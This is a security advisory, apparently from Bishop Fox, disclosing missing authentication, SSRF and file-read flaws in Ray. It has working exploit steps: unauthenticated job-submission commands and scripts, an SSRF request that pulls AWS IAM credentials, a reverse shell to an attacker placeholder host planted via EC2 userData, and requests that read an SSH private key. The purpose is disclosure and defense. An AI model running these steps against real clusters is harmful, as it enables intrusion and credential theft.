The following document describes identified vulnerabilities in the Ray application version 2.6.3 and 2.8.0.
Update 12/4/2023
CORRECTION: The CVE IDs for the Missing Authentication and Server-Side Request Forgery vulnerabilities were swapped in the original version of the post. This has been corrected.
Vendor Response
Anyscale has released Ray version 2.8.1 and states the release addresses two of the three issues identified in the advisory: the Server-Side Request Forgery and Insecure Input Validation vulnerabilities. Authentication is not yet supported in Ray as of this update.
Bishop Fox recommends that Ray users deploy their clusters in isolated networks and control access using other mechanisms, such as SSH bastion hosts. If access to the Ray dashboard is required outside of an isolated network, Ray users could expose it via a reverse proxy service configured to require authentication.
Anyscale has published a blog post responding to this disclosure and has also updated their product documentation to warn users regarding the danger of exposing Ray services without additional security controls.
Product Vendor
Anyscale
Product Description
Ray is an open-source unified compute framework that makes it easy to scale AI and Python workloads. The project’s official website is www.ray.io and the official repository https://github.com/ray-project.... The latest version of the application is 2.8.1, released on December 1, 2023 at https://github.com/ray-project/ray/releases/tag/ray-2.8.1.
Vulnerabilities List
Bishop Fox notified Anyscale of three vulnerabilities in Ray on August 28, 2023. Near the end of Bishop Fox’s 90-day disclosure window, Protect AI revealed that they had previously reported two of the three vulnerabilities to Anyscale, but did not disclose those vulnerabilities until November 16, 2023. Bishop Fox is including details of all three vulnerabilities because our discussion of the issues differs from and complements Protect AI’s documentation.
- Missing Authentication
- Server-Side Request Forgery (SSRF) – first reported by Protect AI
- Insecure Input Validation – first reported by Protect AI
These vulnerabilities are described in the following sections.
Affected Versions
Version 2.6.3 and 2.8.0
Summary of Findings
The Ray framework does not offer authentication and input validation in at least two of its components: Ray Dashboard and Ray Client. This makes it possible for unauthorized users to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials (in a typical AWS cloud install).
Impact
A remote unauthorized user can obtain any data, scripts or files stored in the cluster. In addition, if the Ray framework is installed in the cloud (i.e. AWS), it is possible to retrieve highly privileged IAM credentials that allow privilege escalation. At the time of writing, the Ray GitHub repository has been forked over 4,900 times and the Ray Docker image has been pulled approximately five million times.
Solution
Anyscale has not addressed the vulnerabilities. Bishop Fox recommends that Ray users refrain from exposing the Ray network services to a local network or to the Internet.
Vulnerabilities
Missing Authentication
The APIs in two Ray components: Dashboard and Client, do not implement authentication controls. This lack of authentication mechanisms allows unauthorized actors to freely submit jobs, delete existing jobs, retrieve sensitive information, and achieve remote command execution. The vulnerability could be exploited to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials. (in a typical AWS cloud install).
Vulnerability Details
CVE ID: CVE-2023-48022
Vulnerability Type: Missing Authentication for Critical Function
Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)
Impact: ☒ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)
Security Risk: ☒ Critical, ☐ High, ☐ Medium, ☐ Low
Vulnerability: CWE-306, CWE-1211
In the default configuration, Ray does not enforce authentication. As a result, attackers may freely submit jobs, delete existing jobs, retrieve sensitive information, and exploit the other vulnerabilities described in this advisory. While the Ray documentation included an optional mutual TLS authentication mode, Ray does not appear to support an authorization model. In other words, even if a Ray administrator explicitly enabled TLS authentication, they would be unable to grant users different permissions, such as read-only access to the Ray Dashboard.
The most direct method of exploitation discovered is to submit arbitrary operating system commands for execution via the job submission API using a raw HTTP request or the Ray Jobs Python SDK. These do not require authentication in the default configuration, and are accessible remotely to any system with access to the Ray Dashboard (TCP port 8265 by default).
The figure below demonstrates crafting a JSON job submission to execute the Linux shell command cat /etc/passwd
, sending the malicious JSON file to the jobs API, and then retrieving the output of the executed command:
$ cat cat_passwd.json { "entrypoint": "cat /etc/passwd", "submission_id": "Bishop_Fox_00001", "runtime_env": { }, "metadata": {}, "entrypoint_num_cpus": 1, "entrypoint_num_gpus": 0, "entrypoint_resources": {} } $ curl -v <a href="http://127.0.0.1:8265/api/jobs/" class="redactor-autoparser-object">http://127.0.0.1:8265/api/jobs...</a> -d @cat_passwd.json -H "Content-Type: application/json" * Trying 127.0.0.1:8265... * Connected to 127.0.0.1 (127.0.0.1) port 8265 (#0) > POST /api/jobs/ HTTP/1.1 > Host: 127.0.0.1:8265 > User-Agent: curl/8.1.2 > Accept: */* > Content-Type: application/json > Content-Length: 192 < HTTP/1.1 200 OK < Content-Type: application/json; charset=utf-8 < Content-Length: 67 < Date: Mon, 06 Nov 2023 14:48:30 GMT < Server: Python/3.8 aiohttp/3.8.6 < * Connection #0 to host 127.0.0.1 left intact {"job_id": "Bishop_Fox_00001", "submission_id": "Bishop_Fox_00001"}% $ curl <a href="http://127.0.0.1:8265/api/jobs/Bishop_Fox_00001/logs" class="redactor-autoparser-object">http://127.0.0.1:8265/api/jobs...</a> {"logs": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nray:x:1000:100::/home/ray:/bin/bash\nmessagebus:x:101:102::/nonexistent:/usr/sbin/nologin\n"}%
FIGURE 1 - Executing arbitrary operating system commands via the job API
Protect AI published a MetaSploit Framework module that exploits this technique along with their disclosure, although they did not call out the lack of authentication as a vulnerability. Researcher Bryce Bearchell independently submitted two reports to Protect AI’s huntr platform (https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/ and https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/) during the same time period that Bishop Fox reported the issue directly to Anyscale. However, the reports were closed based on Anyscale’s position that the behavior is by design, and therefore should not be perceived as a vulnerability.
The Ray Jobs Python SDK can also be used to execute code remotely without authentication. The arbitrary command execution is obtained by crafting a malicious Python script using the Ray API to submit a task and then calling this malicious script in the entrypoint parameter of the JobSubmissionClient
object, as shown below:
$ cat malicious.py import ray import os @ray.remote def compromise_system(): os.system(‘cat /etc/passwd’) # Automatically connect to the running Ray cluster. Ray.init() print(ray.get(compromise_system.remote())) $ cat jobs.py from ray.job_submission import JobSubmissionClient, JobStatus import time # If using a remote cluster, replace 127.0.0.1 with the head node’s IP address. Client = JobSubmissionClient(“http://127.0.0.1:8265”) job_id = client.submit_job( # Entrypoint shell command to execute entrypoint=”python malicious.py”, # Path to the local directory that contains the script.py file runtime_env={“working_dir”: “./”} ) print(job_id) def wait_until_status(job_id, status_to_wait_for, timeout_seconds=5): start = time.time() while time.time() – start <= timeout_seconds: status = client.get_job_status(job_id) print(f”status: {status}”) if status in status_to_wait_for: break time.sleep(1) wait_until_status(job_id, {JobStatus.SUCCEEDED, JobStatus.STOPPED, JobStatus.FAILED}) logs = client.get_job_logs(job_id) print(logs)
FIGURE 2 - Scripts to obtain command execution using Ray Jobs Python SDK
Executing the jobs.py script on a device with network connectivity to the Ray API causes the malicious task script to execute on a Ray cluster node and retrieve the output of system command cat /etc/passwd
, as shown below:
$ python3 jobs.py 2023-11-06 08:52:00,027 INFO dashboard_sdk.py:385 – Package gcs://_ray_pkg_04ff8aa220c33990.zip already exists, skipping upload. Raysubmit_Nzy7wuitcjm1Dy7n status: PENDING status: PENDING status: RUNNING status: RUNNING status: RUNNING (compromise_system pid=693) root:x:0:0:root:/root:/bin/bash (compromise_system pid=693) daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin (compromise_system pid=693) bin:x:2:2:bin:/bin:/usr/sbin/nologin (compromise_system pid=693) sys:x:3:3:sys:/dev:/usr/sbin/nologin (compromise_system pid=693) sync:x:4:65534:sync:/bin:/bin/sync (compromise_system pid=693) games:x:5:60:games:/usr/games:/usr/sbin/nologin (compromise_system pid=693) man:x:6:12:man:/var/cache/man:/usr/sbin/nologin (compromise_system pid=693) lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin (compromise_system pid=693) mail:x:8:8:mail:/var/mail:/usr/sbin/nologin (compromise_system pid=693) news:x:9:9:news:/var/spool/news:/usr/sbin/nologin (compromise_system pid=693) uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin (compromise_system pid=693) proxy:x:13:13:proxy:/bin:/usr/sbin/nologin (compromise_system pid=693) www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin (compromise_system pid=693) backup:x:34:34:backup:/var/backups:/usr/sbin/nologin (compromise_system pid=693) list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin (compromise_system pid=693) irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin (compromise_system pid=693) gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin (compromise_system pid=693) nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin (compromise_system pid=693) _apt:x:100:65534::/nonexistent:/usr/sbin/nologin (compromise_system pid=693) ray:x:1000:100::/home/ray:/bin/bash (compromise_system pid=693) messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
FIGURE 3 - Remote command execution via Ray Jobs Python SDK
Additionally, the Ray Client API – exposed on TCP port 10001 by default – is vulnerable to unauthenticated remote code execution via a very similar technique:
$ cat malicious_init.py import ray import os @ray.remote def compromise_system(): os.system(‘cat /etc/passwd’) # Automatically connect to the running Ray cluster. Ray.init(address=”ray://<ray_cluster_head_ip>:10001”) print(ray.get(compromise_system.remote())) (ray_env-3.8) > $ python3 malicious_init.py (compromise_system pid=1038) root:x:0:0:root:/root:/bin/bash (compromise_system pid=1038) daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin (compromise_system pid=1038) bin:x:2:2:bin:/bin:/usr/sbin/nologin (compromise_system pid=1038) sys:x:3:3:sys:/dev:/usr/sbin/nologin …omitted for brevity… (compromise_system pid=1038) nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin (compromise_system pid=1038) _apt:x:100:65534::/nonexistent:/usr/sbin/nologin (compromise_system pid=1038) ray:x:1000:100::/home/ray:/bin/bash (compromise_system pid=1038) messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
FIGURE 4 - Scripts to obtain command execution using Ray Client API
As shown above, the Ray Client API is also vulnerable to arbitrary, unauthenticated command execution, as demonstrated by reading the content of the /etc/passwd file. Bishop Fox does not believe this variation on the overall vulnerability has been disclosed previously.
Researcher Bryce Bearchell submitted a separate variation on this issue to Protect AI on August 30, 2023. That additional variant affects a different Ray API, running on port 52365.
An attacker can use the above techniques to obtain operating system access to all nodes in the Ray cluster, or attempt to retrieve Ray EC2 instance credentials, as discussed in the SSRF finding of this advisory.
Server-Side Request Forgery (SSRF)
The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url
parameter of the /log_proxy
API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid. The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API.
This vulnerability was also reported by researcher Harry Ha to Protect AI on July 21st, 2022, but the report was not made public until November 2023.
Vulnerability Details
CVE ID: CVE-2023-48023
Vulnerability Type: Server-Side Request Forgery (SSRF)
Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)
Impact: ☒ Code execution, ☐ Denial of service, ☒ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)
Security Risk: ☒ Critical, ☐ High, ☐ Medium, ☐ Low
Vulnerability: CWE-441, CWE-918
An SSRF vulnerability was identified in the Ray Dashboard API that can be used to proxy any HTTP or HTTPS request to another system via the Ray API. Bishop Fox staff demonstrated exploiting the vulnerability to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API. This issue was exploitable without authentication and requires network connectivity to the Ray Dashboard port (8265 by default).
The URL parameter of the /log_proxy
API endpoint did not perform sufficient input validation and accepted any HTTP or HTTPS URLs as valid. As a result, an attacker could proxy any HTTP or HTTPS GET request through the API.
Bishop Fox demonstrated the impact of this vulnerability in a typical cloud install of Ray by using it to retrieve IAM credentials from the AWS metadata endpoint, as shown below:
$ curl -v "http://127.0.0.1:8265/log_proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ray-autoscaler-v1" * Trying 127.0.0.1:8265... * Connected to 127.0.0.1 (127.0.0.1) port 8265 (#0) > GET /log_proxy?url=<a href="http://169.254.169.254/latest/meta-data/iam/security-credentials/ray-autoscaler-v1" class="redactor-autoparser-object">http://169.254.169.254/latest/...</a> HTTP/1.1 > Host: 127.0.0.1:8265 > User-Agent: curl/8.1.2 > Accept: */* > < HTTP/1.1 200 OK < Host: 127.0.0.1:8265 < User-Agent: curl/8.1.2 < Accept: */* < Content-Length: 1582 < Content-Type: text/plain < Date: Mon, 06 Nov 2023 15:10:11 GMT < Server: Python/3.8 aiohttp/3.8.6 < { "Code" : "Success", "LastUpdated" : "2023-11-06T15:06:00Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIA53DUJ[REDACTED]", "SecretAccessKey" : "G15CQ8w3ODFCuUacTLCy2TcvfgwJwcC9V01Ah/Ts", "Token" : "IqoJb3JpZ2luX2VjEFcaCXVzLXdlc3Q[REDACTED]", "Expiration" : "2023-11-06T21:34:13Z" $ export AWS_ACCESS_KEY_ID= ASIA53DUJ[REDACTED] $ export AWS_SECRET_ACCESS_KEY=MWS17V0UhqF0oDePjtEWb40W/L[REDACTED] $ export AWS_SESSION_TOKEN=IqoJb3JpZ2luX2VjECcaCXVzLXdlc3QtMiJIMEYCIQDADGR9ZodfTT1yr0 [REDACTED] $ aws sts get-caller-identity { "UserId": "AROA[REDACTED]:i-[REDACTED]", "Account": "[REDACTED]", "Arn": "arn:aws:sts::[REDACTED]:assumed-role/ray-autoscaler-v1/i-[REDACTED]" }
FIGURE 5 - Retrieving and validating IAM EC2 instance credentials associated with the Ray server
As discussed in the Ray documentation, Ray nodes are, by default, are granted full EC2 and S3 permissions.
FIGURE 6 - Documentation regarding Ray’s default EC2 and S3 permissions
The implications of retrieving the Ray EC2 instance credentials is that an attacker can modify an existing EC2 instance in the cloud environment to connect back to an attacking system at boot, as shown below:
$ cat b64code.txt Content-Type: multipart/mixed; boundary=”//” MIME-Version: 1.0 --// Content-Type: text/cloud-config; charset=”us-ascii” MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=”cloud-config.txt” #cloud-config cloud_final_modules: - [scripts-user, always] --// Content-Type: text/x-shellscript; charset=”us-ascii” MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=”userdata.txt” #!/bin/bash bash -I >& /dev/tcp/<ATTACKER-IP>/7733 0>&1 --//% $ cat b64code.txt | base64 > file_encoded.txt $ aws ec2 modify-instance-attribute --instance-id ”i-05f[REDACTED” --attribute userData --value file:///path/to/file/file_encoded.txt $ aws ec2 start-instances --instance-ids i-05f[REDACTED]
FIGURE 7 - Using captured credentials to apply a malicious configuration to an existing instance
As shown in the following figure, a netcat listener received a connection from the instance running in the context of the root user:
$ nc -l 7733 bash: cannot set terminal process group (1364): Inappropriate ioctl for device bash: no job control in this shell root@ip-172-31-38-107:/# id uid=0(root) gid=0(root) groups=0(root)
FIGURE 8 - Reverse TCP shell connection from modified EC2 instance
An attacker could proxy other HTTP traffic through a vulnerable Ray instance to mask the true source of malicious traffic.
Insecure Input Validation
The Ray Dashboard API is affected by an Insecure Input Validation vulnerability in the filename parameter of the /api/v0/logs/file
API endpoint. The API does not perform sufficient input validation within the affected parameter and any arbitrary filesystem path is accepted as valid. The issue is exploitable without authentication, but is dependent on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve sensitive filesystem such as the SSH private key used by Ray to authenticate to other nodes in the associated cluster.
This vulnerability was also reported to Protect AI by researcher Dan McInerney on August 24th, 2023, but the report was not made public until November 16, 2023.
Vulnerability Impact Analysis
CVE ID: CVE-2023-6021
Vulnerability Type: Insecure Input Validation
Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)
Impact: ☒ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)
Security Risk: ☒ Critical, ☐ High, ☐ Medium, ☐ Low
Vulnerability: CWE-20, CWE-73
An insecure input validation is present in the Ray Dashboard’s /api/v0/logs/file
API endpoint. The endpoint accepts arbitrary filesystem paths and does not require authentication, only connectivity to the Ray Dashboard port (8265 by default). The vulnerability was exploited to obtain the SSH private key used by Ray to authenticate to all other nodes in the associated cluster.
To trigger the vulnerability, a valid node_id
value was required. A node_id
could be obtained in the Cluster section of the Ray Dashboard web app in the ID column of the Node List section. In the figure below, the ID of the head node is f3a532dccac4c7fc7a51a82521022f3077bcbf5d03e160502c34a82c
FIGURE 9 - Obtaining a node_id
value via the Ray Dashboard
It is also possible to obtain the node ID calling the Dashboard API /nodes?view=summary
as shown below:
$ curl -s "http://127.0.0.1:8265/nodes?view=summary" | jq -r '.data.summary[].raylet | select(.isHeadNode==true) | .nodeId' f3a532dccac4c7fc7a51a82521022f3077bcbf5d03e160502c34a82c
FIGURE 10 - Obtaining a node_id
value via the Ray Dashboard API
If a valid node_id
value is included in the request, the Ray Dashboard API returns the content of any file accessible to the account the web application server is running as. For example, in response to a curl
command, the API returns the content of the server’s /etc/passwd
file, as shown below:
$ export node_id=$(curl -s "http://127.0.0.1:8265/nodes?view=summary" | jq -r '.data.summary[].raylet | select(.isHeadNode==true) | .nodeId') $ curl "http://127.0.0.1:8265/api/v0/logs/file?node_id=$node_id&filename=/etc/passwd&lines=100" 1root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin ray:x:1000:100::/home/ray:/bin/bash messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
FIGURE 11 - Reading /etc/passwd
file remotely
In a typical AWS cloud install, one can find a bootstrap config file in the home directory of the ray user. This bootstrap config file contains various details such as the cluster settings, including the full filesystem path where an SSH key is stored.
After obtaining the home directory of the ray user from the /etc/passwd
file, it is possible to exploit the same vulnerability to retrieve the Ray bootstrap configuration file. As shown below, the bootstrap configuration file contained the path to an SSH private key:
$ curl "http://127.0.0.1: 8265/api/v0/logs/file?node_id=$node_id&filename=/home/ray/ray_bootstrap_config.yaml&lines=100" 1{"cluster_name": "default", "max_workers": 2, "upscaling_speed": 1.0, "docker": {"image":"rayproject/ray-ml:latest-gpu", "container_name": "ray_container", "pull_before_run": true, "run_options": ["--ulimit nofile=65536:65536"]}, "idle_timeout_minutes": 5, "provider":{"type": "aws", "region": "us-west-2", "availability_zone": "us-west-2a,us-west-2b", "cache_stopped_nodes": true}, "auth": {"ssh_user": "ubuntu", "ssh_private_key": "~/ray_bootstrap_key.pem"}, "available_node_types": {"ray.head.default": {"resources": {"CPU": 2}, "node_config": {"InstanceType": "m5.large", "ImageId": "ami-0387d929287ab193e",…omitted for brevity…
FIGURE 12 - Retrieving bootstrap configuration file
The SSH private key is used by Ray for communication between cluster nodes. It is possible to read the private key content using the same vulnerable API, and then, use it to access cluster nodes via SSH, as shown below:
$ curl "http://127.0.0.1:8265/api/v0/logs/file?node_id=$node_id&filename=/home/ray/ray_bootstrap_key.pem&lines=100" 1-----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAg9OtaoHqoL9K6...[REDACTED]...aXL+Un1sWrVzk6gXkdg gOKVcn5aN6or5SW3XQCye8H1qdhMMbtxr9wz6ddr92XsUieEOOcktg== -----END RSA PRIVATE KEY----- $ ssh -i <captured_key> ubuntu@<public_ray_dashboard_ip> ============================================================================= __| __|_ ) _| ( / Deep Learning AMI (Ubuntu 18.04) Version 61 ___|\___|___| ============================================================================= Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 5.4.0-1075-aws x86_64v) Please use one of the following commands to start the required environment with the framework of your choice: for TensorFlow 2.7 with Python3.8 (CUDA 11.2 and Intel MKL-DNN) _____________ source activate tensorflow2_p38 …omitted for brevity… ubuntu@ip-172-31-37-231:~$ id uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(lxd),114(netdev),998(docker)
FIGURE 13 - Retrieving and validating SSH private key
As demonstrated above, this vulnerability could be leveraged to compromise an entire Ray cluster.
Credits
- Berenice Flores, Senior Security Consultant I, Bishop Fox ([email protected])
Timeline
- 08/22/2023: Initial discovery
- 08/28/2023: Contact with vendor
- 08/29/2023: Vendor acknowledged vulnerabilities
- 11/27/2023: Vulnerabilities publicly disclosed
- 12/4/2023: Public disclosure updated to reflect the latest developments from Vendor
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.